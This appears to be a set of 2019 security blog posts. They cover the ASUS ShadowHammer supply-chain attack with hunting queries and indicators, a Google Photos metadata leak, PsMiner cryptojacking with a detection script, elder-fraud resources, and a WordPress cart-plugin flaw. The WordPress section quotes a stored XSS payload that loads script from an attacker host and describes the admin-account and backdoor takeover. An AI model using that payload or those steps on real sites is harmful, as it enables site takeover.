ASUS has also implemented a fix in the latest version (ver. 3.6.8) of the Live Update software, introduced multiple security verification mechanisms to prevent any malicious manipulation in the form of software updates or other means, and implemented an enhanced end-to-end encryption mechanism. In its own statement, ASUS adds: “At the same time, we have also updated and strengthened our server-to-end-user software architecture to prevent similar attacks from happening in the future.”
ASUS has additionally created an online security diagnostic tool to check for affected systems, and encourages users who are still concerned to run it as a precaution. The tool can be found here: https://dlcdnets.asus.com/pub/ASUS/nb/Apps_for_Win10/ASUSDiagnosticTool/ASDT_v1.0.1.0.zip
Users who have any additional concerns are welcome to contact ASUS Customer Service.

More information about APT groups: https://www.fireeye.com/current-threats/apt-groups.html

 
ASUS FAQ:
  • How do I know whether or not my device has been targeted by the malware attack?
    Only a very small number of devices belonging to a specific user group were found to have been targeted by this attack, and as such it is extremely unlikely that your device has been targeted. However, if you are still concerned about this matter, feel free to use ASUS’ security diagnostic tool or contact ASUS Customer Service for assistance.
  • What should I do if my device is affected?
    Immediately run a backup of your files and restore your operating system to factory settings. This will completely remove the malware from your computer. In order to ensure the security of your information, ASUS recommends that you regularly update your passwords.
  • How do I make sure that I have the latest version of ASUS Live Update?
    You can find out whether or not you have the latest version of ASUS Live Update by following the instructions shown in the link below:
    https://www.asus.com/support/FAQ/1018727/
  • Have other ASUS devices been affected by the malware attack?
    No, only the version of Live Update used for notebooks has been affected. All other devices remain unaffected.
 

Analysis

Our ShadowHammer detections center around variants of the backdoored Asus Live Update app representing at least two generations of attack code. These generations are marked by samples with shellcode that are either in plaintext or encrypted. Also, the appearance of these updater variants corresponds to the validity dates of the certificates used to sign them.
The backdoored updaters might have been designed to target specific computers. They contain hardcoded MD5 hashes representing MAC addresses. They appear to use these hashes to identify targets and determine whether to deploy additional payloads.
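Because the targeting list is made of MD5 hashes of MAC addresses rather than the addresses themselves, a defender who has extracted those hashes from a sample can still answer "was any machine in my fleet on the list?" by hashing the fleet's own MACs and comparing. The script below is an added example, not Microsoft's or ASUS's tooling. The exact string form the implant hashed (separator, letter case) is not stated here, so the script tries the common spellings of each address, which is an assumption of this example; the target list it ships with is constructed from a made-up MAC purely to exercise the code and contains no real ShadowHammer indicators.

```python
import hashlib
import re


def mac_forms(mac: str):
    """Yield common textual spellings of one MAC address. Which spelling the implant
    hashed is not stated on the page, so every candidate is tried (an assumption)."""
    digits = re.sub(r"[^0-9a-fA-F]", "", mac)
    if len(digits) != 12:
        raise ValueError(f"not a MAC address: {mac!r}")
    pairs = [digits[i:i + 2] for i in range(0, 12, 2)]
    for case in (str.lower, str.upper):
        octets = [case(p) for p in pairs]
        yield ":".join(octets)
        yield "-".join(octets)
        yield "".join(octets)


def mac_hashes(mac: str) -> dict:
    """Map MD5 hex digest -> MAC spelling for every candidate form of one address."""
    return {hashlib.md5(form.encode()).hexdigest(): form for form in mac_forms(mac)}


def check_targets(local_macs: list, target_md5s: list) -> list:
    """Return (mac, spelling) pairs whose MD5 appears in the implant's hardcoded target list."""
    targets = {h.lower() for h in target_md5s}
    hits = []
    for mac in local_macs:
        for digest, form in mac_hashes(mac).items():
            if digest in targets:
                hits.append((mac, form))
    return hits


# Constructed target list: the MD5 of one made-up MAC, standing in for hashes
# carved out of a backdoored updater sample. Not real indicators.
CONSTRUCTED_TARGETS = [hashlib.md5(b"00:11:22:33:44:55").hexdigest()]

if __name__ == "__main__":
    # On a real host, collect adapter MACs with `ip link`, `getmac` or uuid.getnode()
    # and feed them in here instead of these constructed values.
    print(check_targets(["00-11-22-33-44-55", "AA:BB:CC:DD:EE:FF"], CONSTRUCTED_TARGETS))
```

A match does not mean the payload ran, only that the machine was on the attacker's list; a non-match across every spelling is the reassuring outcome for a fleet that did install the backdoored updater.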

Mitigations

Apply these mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.
  • Turn on cloud-delivered protection and automatic sample submission on Windows Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.
  • Utilize the Windows Defender Firewall and your network firewall to prevent RPC and SMB communication among endpoints whenever possible. This limits lateral movement as well as other attack activities.
  • Secure internet-facing RDP services behind a multi-factor authentication (MFA) gateway. If you don't have an MFA gateway, enable network-level authentication (NLA) and ensure that server machines have strong, randomized local admin passwords.
  • Customers that have not installed the ASUS Live Update app are not affected by the known attack method. Customers can either uninstall this app or get the latest version. According to Asus, version 3.6.8 includes a fix and additional mechanisms that can prevent manipulation of updates.
  • Utilize Microsoft Edge or other web browsers that support SmartScreen. SmartScreen has removed reputation information for the certificates abused during these attacks. Binaries signed with those certificates will trigger a warning about an “unrecognized app”.

Detection details

Windows Defender Antivirus
Windows Defender Antivirus detects trojanized apps and backdoor implants as the following malware:
Endpoint detection and response (EDR)
Alerts with the following titles in the Windows Defender Security Center portal can indicate threat activity on your network:
  • Malicious binaries associated with a supply chain attack
  • Network traffic to domains associated with a supply chain attack
Advanced hunting
Publicly available reports indicate that this attack took place from June to November 2018, so some customers might only have telemetry around this period. To locate related attack activity in the past 30 days, run the following queries:
//Event types that may be associated with the implant or container
union ProcessCreationEvents, NetworkCommunicationEvents, FileCreationEvents, ImageLoadEvents
| where EventTime > ago(30d)
//File SHAs for implant and container (the values are SHA-1 hashes, so match the SHA1 column)
| where InitiatingProcessSHA1 in("e01c1047001206c52c87b8197d772db2a1d3b7b4",
"e005c58331eb7db04782fdf9089111979ce1406f", "69c08086c164e58a6d0398b0ffdcb957930b4cf2")

//Download domain (run as a separate query)
NetworkCommunicationEvents
| where EventTime > ago(30d)
| where RemoteUrl == "asushotfix.com" or RemoteIP == "141.105.71.116"
The provided query checks events from the past 30 days. Change EventTime to focus on a different period.

Indicators

Files (SHA-1)
Malware download URL
  • hxxp://asushotfix.com
URLs with compromised packages
  • hxxp://liveupdate01.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER365.zip
  • hxxps://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER362.zip
  • hxxps://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER360.zip
  • hxxps://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER359.zip
Abused certificates
ASUSTeK Computer Inc.
Status: This certificate has expired and is no longer valid.
Issuer: DigiCert SHA2 Assured ID Code Signing CA
Valid from: 12:00 AM 07/27/2015
Valid to: 12:00 PM 08/01/2018
Valid usage: Code Signing
Algorithm: sha256RSA
Thumbprint: 29935023FF1386F5F0A0355B778B0DFF2022E196
Serial number: 0F F0 67 D8 01 F7 DA EE AE 84 2E 9F E5 F6 10 EA

ASUSTeK Computer Inc.
Status: Valid
Issuer: DigiCert SHA2 Assured ID Code Signing CA
Valid from: 12:00 AM 06/20/2018
Valid to: 12:00 PM 06/22/2021
Valid usage: Code Signing
Algorithm: sha256RSA
Thumbprint: 626646D29C5B0E7C53AA84698A4A97BE323CF17F
Serial number: 05 E6 A0 BE 5A C3 59 C7 FF 11 F4 B4 67 AB 20 FC

References

Sites to check if your device has been targeted
Thanks to various sources for this information including ASUS, FireEye, and Susan E Bradley


Saturday, March 23, 2019

Metadata remnants patched on Google Photos

   A bug was discovered this week in Google Photos, where the metadata of all photos in a user's Google Photos account could be easily read and collected. Bad actors would target a particular query, for example a location, and then measure the time it takes for the website to respond. Even though the response might be an access denied, there is value in knowing whether a match is present or not. It is possible to confirm or deny the presence of particular tags in the photo when using this cross-site search method of attack.

    Location is probably one of the more dangerous pieces of information that can be leaked using this attack, as it is possible to build a timeline of the victim's travels and locations using consecutive searches. In the original report of this issue, the researcher was able to divine the approximate date and time of a visit to another country using a malicious website that interacted with a logged-in Google Photos account.

    While this attack doesn't give any access to the photos themselves, or to anything other than whether or not the specified terms/queries exist, the benefits can be extrapolated to schedules and can allow for more finely crafted malvertisements or phishing attempts. One could imagine a malware-ridden site harvesting emails, gaining access to location information, and then sending malicious emails concerning issues with travel expenses to a location, which is lent more credence by the fact that the victim has traveled to that location within the time frame in which the email is sent.

   While this exploit in particular has been patched, there are countless other browser-side attacks that can be exploited, and safeguarding your data is paramount. This attack shows how a clever adversary can wield information no matter how small the leakage. Tools are available for content control to prevent data leakage. Tools such as PuriFile can help you manage metadata, scrub documents of sensitive terms and information, and even help detect data that may be obfuscated.

Sources:
https://www.zdnet.com/article/google-photos-vulnerability-could-have-let-hackers-retrieve-image-metadata/

https://www.imperva.com/blog/now-patched-google-photos-vulnerability-let-hackers-track-your-friends-and-location-history/

Thanks to Peraton for this information

ELDERLY FRAUD AND ABUSE IN AMERICA RESOURCES

Please share this important information with those you know.

United States Attorney William P. Barr recently stated that crimes against the elderly target some of the most vulnerable people in our society. Because of their stage in life, they frequently don't have the opportunity to recover, and the losses are devastating to them.
Whether as the result of isolation, diminished cognition, financial insecurity, trusting too much, being ashamed to report being scammed or concerned about how relatives will react, serious concern for health, or other causes, many of these crimes go unreported.

Information on The Federal Bureau of Investigation Site

https://www.fbi.gov/scams-and-safety/common-fraud-schemes/seniors


Information on The Department of Justice Site

The video below discusses scams and identity theft, looks at trends and gives tips and tools with a focus on the Federal Trade Commission's Pass It On Campaign:


Extent of elder abuse, causes and characteristics, addressing mistreatment, financial exploitation and perpetrators:


Abuse by caregivers, domestic violence, fraud and financial abuse, training resources and tools, and additional information and resources: https://www.ncjrs.gov/elderabuse/

Contains prosecutor video series, federal financial exploitation resources, rural and tribal resources, multidisciplinary guide and toolkit, webinars for elder abuse professionals, elder abuse statutes and elder justice resources by state: https://justice.gov/elderlyjustice

Information on The Better Business Bureau Site


The BBB tracks reported scams throughout the U.S.

If you become aware of elder fraud and/or abuse, you are right to be concerned. If you SEE SOMETHING, please SAY SOMETHING in a timely manner to law enforcement, security and/or your supervisor, and give the authorities the chance to make a difference.

Friday, March 15, 2019

The Virtual Security Summit by Microsoft

This free event has lots of good content; the sessions are listed below. The event is streaming live April 16, 9-12 noon PT.
To register go here

Sessions and featured speakers

Securing emerging technologies
Learn about the new trends that will affect cybersecurity into the future of Internet of Things and Machine Learning, and learn how to maintain your organization’s resiliency throughout innovations in cybersecurity.
Featured speakers: Sian John, Chief Security Advisor, Microsoft EMEA; Hafid Elabdellaoui, Chief Security Advisor, Microsoft

Evolution of cyberthreats: Customer conversation identity and threat
Join this discussion on the evolution of cyberthreats and the latest thinking on identity and threat protection tactics.
Featured speakers: Joram Borenstein, General Manager, Cybersecurity Solutions Group, Microsoft; Kostas Georgakopoulos, Chief Information Security Officer, Procter & Gamble

The importance of security frameworks CIS, NIST and others
Fraud Detection as a Service (FDaaS) is helping government customers detect and prevent improper payments. Learn how your agency can save significant staff resources and ensure proper distribution of funds.
Featured speakers: Curtis W. Dukes, Executive Vice President and General Manager, Security Best Practices and Automation Group, CIS; Sean Sweeney, Americas Director, Cybersecurity Solutions Group, Microsoft

Threat of Cryptojacking Still an Issue

In November of 2018, Forbes ran an article about the increase in cryptojacking. At the time, the Cyber Threat Alliance (CTA) was indicating a 629% increase in infections in the short time between Q1 and Q2 of 2018. Threats had grown from an estimated 400,000 infections (Q4 2017) to 2.5 million infected machines in Q2 of 2018. 2019 is still showing growth in cryptojacking threats.

The number of tools available to bad actors has grown. For example, WebCobra, a Russian threat that McAfee Labs researchers found, was able to drop one of two different payloads based on the architecture it detected on the infected machine.

The threats are continuing to become more sophisticated as well. 360 Total Security researchers have released the details of the newer PsMiner malware, which is designed to exploit known vulnerabilities in servers running ElasticSearch, Hadoop, Redis, Spring, WebLogic, ThinkPHP, and SQL Server to spread from server to server and mine Monero.

The worm uses a file called Systemctl.exe, written in the Go language, to bundle and then download the exploit modules and to attack Windows servers. In addition to the exploits, PsMiner has the ability to brute-force its way into a system: when it detects weak or default credentials, it can utilize a brute-force password-cracking component.

Once PsMiner has access to a system, it uses a PowerShell command to download a WindowsUpdate.ps1 with a malicious payload and a master module that drops the Monero miner on the system. The malware then copies itself into the temp directory and creates a scheduled task called “Update service for Windows Service” that runs once every 10 minutes to prolong and refresh the infection. Using the XMRig CPU miner and a custom mining profile while relying on Living-off-the-Land (LotL) techniques, the worm can persist for some time.

This also shows the level of sophistication to which bad actors have access. Another example of this type of attack sticking around is the eight Microsoft Store apps found dropping cryptojacking malware on systems: Fast-search Lite, Battery Optimizer (Tutorials), VPN Browsers+, Downloader for YouTube Videos, Clean Master+ (Tutorials), FastTube, Findoo Browser 2019, and Findoo Mobile & Desktop Search.

These apps have since been removed from the Microsoft Store, but they show a troubling pattern of predatory behavior. Estimates indicate that ten times more organizations were affected by cryptojacking than by ransomware just last year. It is clear that cryptojacking is still a threat to consider in 2019.
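Persistence traits like these are what a defender hunts for on a server suspected of running PsMiner. The following is an added example, not code from the original post or from the 360 Total Security analysis; it scans a constructed, simplified scheduled-task export (the column layout task_name, command, repeat_minutes is an assumption, not the real schtasks format) for the task name, payload script, temp-directory path and 10-minute repeat described above.

```python
"""Flag scheduled tasks that show the PsMiner persistence traits described above.

Added example, not code from the original post or from 360 Total Security's
analysis. Records are a constructed, simplified export with columns task_name,
command and repeat_minutes (an assumption, not the real schtasks layout).
"""
import csv
import io
import re

# Traits taken from the write-up: the task name, PowerShell running
# WindowsUpdate.ps1, a copy living in a temp directory, a 10-minute repeat.
KNOWN_TASK_NAME = "Update service for Windows Service"
POWERSHELL_RE = re.compile(r"\bpowershell(\.exe)?\b", re.IGNORECASE)
PAYLOAD_RE = re.compile(r"WindowsUpdate\.ps1", re.IGNORECASE)
TEMP_DIR_RE = re.compile(r"\\(temp|tmp)\\", re.IGNORECASE)
SHORT_REPEAT_MINUTES = 10

def score_task(task):
    """Return the list of suspicious traits one task record matches (empty if none)."""
    reasons = []
    name, command = task["task_name"].strip("\\"), task["command"]
    repeat = int(task["repeat_minutes"] or 0)
    if name == KNOWN_TASK_NAME:
        reasons.append("task name matches the PsMiner persistence task")
    if POWERSHELL_RE.search(command) and PAYLOAD_RE.search(command):
        reasons.append("PowerShell launching WindowsUpdate.ps1")
    if TEMP_DIR_RE.search(command):
        reasons.append("action runs from a temp directory")
    if POWERSHELL_RE.search(command) and 0 < repeat <= SHORT_REPEAT_MINUTES:
        reasons.append(f"PowerShell task repeating every {repeat} minutes")
    return reasons

def find_suspicious_tasks(csv_text):
    """Map task name -> matched traits for every record with at least one hit."""
    hits = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        reasons = score_task(row)
        if reasons:
            hits[row["task_name"]] = reasons
    return hits

# Constructed sample export: one benign task and one showing the traits above.
SAMPLE_EXPORT = """\
task_name,command,repeat_minutes
\\Microsoft\\Windows\\Defrag\\ScheduledDefrag,%windir%\\system32\\defrag.exe -c,0
\\Update service for Windows Service,powershell.exe -File C:\\Users\\Public\\temp\\WindowsUpdate.ps1,10
"""
```

Each trait is scored separately so a renamed task that keeps the short PowerShell repeat or the temp-directory payload still surfaces.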

Sources
https://www.bleepingcomputer.com/news/security/malware-spreads-as-a-worm-uses-cryptojacking-module-to-mine-for-monero/

https://www.forbes.com/sites/rachelwolfson/2018/11/13/cryptojacking-on-the-rise-webcobra-malware-uses-victims-computers-to-mine-cryptocurrency/#20183346c336

https://blog.malwarebytes.com/cybercrime/2018/02/state-malicious-cryptomining/

Abandoned Cart plugin for WordPress sites exploit.

    Online shopping has the convenience of collecting items and dispensing personal judgement on the things you like and the things you don’t, all without the effort of hauling those things around a labyrinth of smells and sounds! And with the Abandoned Cart plugin for WordPress sites, the site administrator can hold on to your cart in case you want to pick up where you left off if a sudden pressing matter arises, or if you simply lose interest for the time being. But Wordfence security researchers have noticed a flaw in the execution of the Abandoned Cart plugin which enables a complete site takeover, along with laying a secondary backdoor to regain access in case of discovery.

    The Abandoned Cart plugin had a distinct lack of sanitization on the input and output of fields used when a user begins checking out. The billing_first_name and billing_last_name data fields are stored as entered. The two fields are then displayed concatenated in a customer field when the administrator logs in to view their dashboard. The attack creates random first and last names and random email addresses to be acceptable form entries, but enters both the first and the last name as the billing_first_name entry and “<script src=hXXps://bit[.]ly/2SzpVBY></script>” as the billing_last_name field. The URL points to a command-and-control (C2) server, “hXXps://cdn-bigcommerce[.]com/visionstat.js”, which contains a malicious JavaScript payload.

    The attacker first uses the victim’s browser session to perform trusted actions on the WordPress website using hidden iframes, acting while the user is unaware of the intrusion. The first action taken is creating an administrative user for the site to which the attacker holds the credentials. Who needs a backdoor when you can create keys to the front door for yourself? The username of these clandestine accounts has consistently been found to be “woouser”, with a “woouser” email at mailinator, a free disposable email service. The malicious JavaScript then infects an inactive plugin with a malicious script that continues to listen for commands from the C2 server. The script can execute arbitrary PHP code on the compromised server. Both infiltration processes report the infected website’s URL to the C2 server, and a confirmation email is sent to the mailinator address to confirm the administrator account.

    A patch for this vulnerability was released, which uses WordPress’ own data sanitizer to exclude names beginning with “<” and any account with “woouser” in the email. While this prevents the initial attack from creating adversary-controlled accounts, it doesn't address the code injection in the deactivated plugins.
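To show where the flaw sits, here is an added example (not the plugin's code and not Wordfence's) that mirrors the vulnerable concatenation in Python, with html.escape() standing in for WordPress's esc_html(), next to the two input checks the patch added; the checkout record is constructed from the defanged script tag quoted above.

```python
"""Stored XSS in the cart dashboard: unsafe vs. escaped rendering of billing names.

Added example, not code from the Abandoned Cart plugin or from Wordfence. It
mirrors the flaw in Python, with html.escape() standing in for WordPress's
esc_html(); the checkout record is constructed from the payload quoted above.
"""
import html

# Constructed checkout record of the shape the write-up describes: both names in
# billing_first_name, the (defanged) script tag in billing_last_name.
CART = {
    "billing_first_name": "Alice Example",
    "billing_last_name": "<script src=hXXps://bit[.]ly/2SzpVBY></script>",
    "billing_email": "woouser@mailinator.com",
}

def render_customer_unsafe(cart):
    """Pre-patch behaviour: fields stored as entered and concatenated into HTML."""
    return "<td>%s %s</td>" % (cart["billing_first_name"], cart["billing_last_name"])

def render_customer_safe(cart):
    """Escape at the output point, so markup inside a name is shown as text."""
    name = "%s %s" % (cart["billing_first_name"], cart["billing_last_name"])
    return "<td>%s</td>" % html.escape(name, quote=True)

def rejected_by_patch(cart):
    """The two input-side checks the patch added, as described above."""
    names = (cart["billing_first_name"], cart["billing_last_name"])
    return any(n.startswith("<") for n in names) or "woouser" in cart["billing_email"]

def is_markup_free(rendered):
    """True when nothing between the <td> wrapper tags can be parsed as a tag."""
    inner = rendered[len("<td>"):-len("</td>")]
    return "<" not in inner and ">" not in inner
```

The patch's checks stop the reported form submissions, while escaping at the render point neutralizes any markup that is already stored; a complete fix needs both, plus a review of the deactivated plugins the post mentions.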

Sources:
https://www.wordfence.com/blog/2019/03/xss-flaw-in-abandoned-cart-plugin-leads-to-wordpress-site-takeovers/

https://nakedsecurity.sophos.com/2019/03/13/update-now-wordpress-abandoned-cart-plugin-under-attack/